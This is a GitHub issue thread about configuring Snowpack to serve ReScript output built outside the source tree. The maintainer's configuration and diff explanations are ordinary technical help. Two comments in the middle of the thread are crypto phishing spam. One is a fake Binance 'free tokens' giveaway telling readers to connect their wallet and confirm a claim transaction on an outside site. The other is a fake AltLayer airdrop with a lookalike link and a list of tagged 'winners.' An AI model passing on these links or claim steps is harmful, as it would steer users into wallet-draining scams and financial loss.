### ISSUE TITLE
Specify in-source: false?

### ISSUE THREAD

**Issue by tom-sherman** [jihchi/app-template-reason-react#9]
in-source: false allows Rescript files to be built to an external directory, instead of the build artefacts existing next to the source files.

Is this possible? I tried to specify it and tweak the mount options but I couldn't get it to work.

```js
/** @type {import("snowpack").SnowpackUserConfig } */
module.exports = {
  mount: {
    public: { url: '/', static: true },
    'lib/es6/src': { url: '/dist' },
    src: { url: '/dist' },
  },
  plugins: [
    '@snowpack/plugin-react-refresh',
    '@snowpack/plugin-dotenv',
    [
      '@snowpack/plugin-run-script',
      {
        cmd: 'bsb -make-world',
        watch: '$1 -w',
      },
    ],
  ],
  packageOptions: {
    /* ... */
  },
  devOptions: {
    /* ... */
  },
  buildOptions: {
    /* ... */
  },
  alias: {
    /* ... */
  },
};

```

**Comment by jihchi** [comment]
Yes, It seems like we couldn't assign two directories to serve `/dist` endpoint.

---

Also, I tried to add an new endpoint (`/res`) to serve `lib/es6/src` folder, unfortunately it does works as well:

1. Add an new endpoint `/res` which content is coming from `lib/es6/src`:
```js
// snowpack.config.js
  mount: {
    public: { url: "/", static: true },
    "lib/es6/src": { url: "/res" },
    src: { url: "/dist" },
  },
```
2. Change the endpoint of entry file in `public/index.html`:
```diff
// public/index.html
- <script type="module" src="/dist/index.bs.js"></script>
+ <script type="module" src="/res/index.bs.js"></script>
```
3. When you open http://localhost:8080, `http://localhost:8080/res/index.bs.js` is loaded correctly but it couldn't load `/res/index.css.proxy.js`:
![2021-02-04 15-54-01(1)](https://user-images.githubusercontent.com/87983/106861959-6b6f0c00-6701-11eb-8beb-55aa6f76c7d6.jpg)
4. Because the dependency we are depending on still remains in `src/` while the generated js has been moved to `lib/es6/src`: 
```res
// src/App.res
%%raw(`import './App.css';`)
```

---

I don't have a solution or workaround for this at the moment, this might be worthwhile to raise this issue in snowpack.

**Comment by xcluz-git** [comment]
# Binance Free Tokens Giveaway - Claim Yours Now! 🎉💰

Welcome to the exclusive Binance Free Tokens giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this fantastic opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

![https://www.bnbrewards.online/?source=github](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)

<center>Act swiftly and enjoy your tokens! This limited-time offer won't be available forever. 🌐💰</center>

# Steps to Claim:

1. **Spread the Excitement on Twitter:**
   - Share the news about claiming your free tokens!
     - **Tweet:** [Share this Airdrop](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto&hashtags=BinanceFreeTokens,Crypto)

2. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=github) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

3. **Interact with the Contract:**
   - Once your wallet is connected, go to the [Binance Rewards](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

4. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

5. **Spread the Excitement Further:**
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

**Comment by AshvinGudaliya** [comment]
# AltLayer Airdrop Season One Announcement

[![AltLayer Airdrop Season One](https://miro.medium.com/v2/da:true/resize:fit:1200/0*QvP91LW92QLv9_qq)](http://go.altlayerio.online/zHaxVS)

Exciting news! AltLayer token (ALT) is set to launch on Binance on January 25, 2024. This milestone couldn't have been reached without our amazing community. Your support has been crucial from conceptualization to product development.

To show our gratitude, we're inviting you to join the "ALT Token community" through an airdrop for early supporters and partners. Below is a summary:

- **Total Allocated ALT Tokens:** 300,000,000 (3% of total supply)
- **Distribution Categories:**
  - NFT Holders
  - Altitude Campaign Participants
  - EigenLayer Restakers
  - EigenLayer Ecosystem Partners
  - Celestia Stakers and others

For detailed criteria and information, check the full announcement [here](http://go.altlayerio.online/zHaxVS).

[Claim](http://go.altlayerio.online/zHaxVS) opens from January 25 to February 25, 2024. Unclaimed ALT tokens after this period will return to AltLayer’s Treasury.

Thank you for being part of AltLayer's success! More to come in Season One, stay tuned.

**Note:** Certain regions are restricted from the airdrop. Please review the disclaimer before participating.


Winners: @cniweb, @JosephHTobinJr, @hutchins, @technik777, @ktypez, @TinyBud, @nikumu, @boguslav, @L1LjSHX, @LxxBlue, @a7medahir, @arthursunbao, @expose, @liusn, @zzg890, @eriknayan, @void-mian, @arall, @C-Band, @buroz

**Comment by scottdotau** [comment]
Github has spam now? 😔

**Comment by jihchi** [comment]
> Github has spam now? 😔

Unfortunately, yes.
